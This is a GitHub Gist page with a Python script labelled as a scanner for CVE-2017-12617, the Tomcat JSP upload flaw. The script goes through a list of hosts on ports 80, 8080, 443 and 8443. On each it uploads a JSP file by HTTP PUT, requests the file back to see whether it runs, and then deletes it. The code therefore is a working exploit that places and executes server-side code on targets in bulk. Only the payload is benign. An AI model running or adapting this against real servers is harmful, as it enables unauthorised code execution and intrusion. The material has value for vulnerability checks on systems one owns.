Last active
October 5, 2017 22:10
-
-
Save klustic/16ee7206e27308d1bdb21108ddc179fd to your computer and use it in GitHub Desktop.
Scan for CVE-2017-12617
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import argparse | |
import itertools | |
import logging | |
import requests | |
import sys | |
import threading | |
import urllib3 | |
class Scanner(object): | |
def __init__(self, hosts, loglevel=logging.WARNING): | |
self.hosts = set(hosts) | |
self.vulnerable = [] | |
self.path = '/dmarttest.jsp' | |
self.headers = {'Connection':'close'} | |
self.logger = logging.getLogger(self.__class__.__name__) | |
self.logger.setLevel(loglevel) | |
@staticmethod | |
def gen(host): | |
return list(itertools.product(['https'], [host], [443, 8443])) + list(itertools.product(['http'], [host], [80, 8080])) | |
def run(self): | |
for _host in self.hosts: | |
for host in self.gen(_host): | |
url = '{}://{}:{}'.format(*host) + self.path | |
try: | |
self.logger.debug('{} (PUT)...'.format(url)) | |
pr = requests.put(url + '/', headers=self.headers, data='<% out.println("hello");%>', timeout=2, verify=False) | |
except Exception as e: | |
#self.logger.debug(e) | |
continue | |
self.logger.debug('{} (PUT) -> {} {}'.format(url, pr.status_code, pr.reason)) | |
if not (200 <= pr.status_code < 300): | |
continue | |
try: | |
self.logger.debug('{} (GET)'.format(url)) | |
pg = requests.get(url, headers=self.headers, verify=False) | |
except Exception as e: | |
#self.logger.debug(e) | |
continue | |
self.logger.debug('{} (GET) -> {} {}'.format(url, pr.status_code, pr.reason)) | |
self.logger.debug(pg.text) | |
if 'hello' in pg.text: | |
self.logger.warning('VULNERABLE: {}'.format(host)) | |
requests.delete(url+'/', headers=self.headers, verify=False) | |
return | |
def main(): | |
parser = argparse.ArgumentParser() | |
parser.add_argument('list', help='Name of a file containing a list of hosts to check') | |
args = parser.parse_args() | |
with open(args.list) as f: | |
hosts = f.read().split() | |
s = Scanner(hosts, loglevel=logging.DEBUG) | |
s.run() | |
if __name__ == '__main__': | |
logging.basicConfig(level=logging.WARNING) | |
logging.getLogger().addHandler(logging.FileHandler(sys.argv[0]+'.log')) | |
urllib3.disable_warnings() | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment